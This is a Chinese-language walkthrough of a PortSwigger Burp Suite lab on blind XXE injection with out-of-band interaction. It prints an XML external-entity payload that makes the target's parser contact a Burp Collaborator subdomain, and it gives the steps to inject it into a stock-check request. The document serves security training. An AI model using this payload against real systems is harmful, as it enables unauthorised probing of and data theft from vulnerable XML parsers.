bp官方靶场xml外部实体（XXE）注入漏洞3

第三关 带外交互的盲 XXE

提示：1、靶场具有“检查库存”功能，可解析 XML 输入，但不显示结果。

2、可以通过触发与外部域的带外交互来检测盲 XXE 漏洞。

3、 若要解决该实验室问题，请使用外部实体使 XML 分析器向 Burp Collaborator 发出 DNS 查找和 HTTP 请求。

具体操作：

1、运行burp时，访问产品页面，单击“检查库存”

2、找到触发的库存检查的POST /product/stock数据包，发往repeater

3、在 XML 声明和 stockCheck 元素之间插入以下外部实体定义，右键单击并选择“插入协作者有效负载”以在指示的位置插入 Burp Collaborator 子域：

先复制burp生成的子域名：

3rvkooipl8lvi3logf5qb8i6axgo4js8.oastify.com

在 XML 声明和 stockCheck 元素之间插入以下外部实体插入外部实体

<!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://3rvkooipl8lvi3logf5qb8i6axgo4js8.oastify.com"> ]>

将 productId 编号替换为对外部实体的引用：&xxe;

转到“Collaborator”选项卡，然后单击“poll now”。如果您没有看到任何互动，请等待几秒钟，然后重试。您应该会看到应用程序因有效负载而启动的一些 DNS 和 HTTP 交互。

刷新浏览器，靶场过关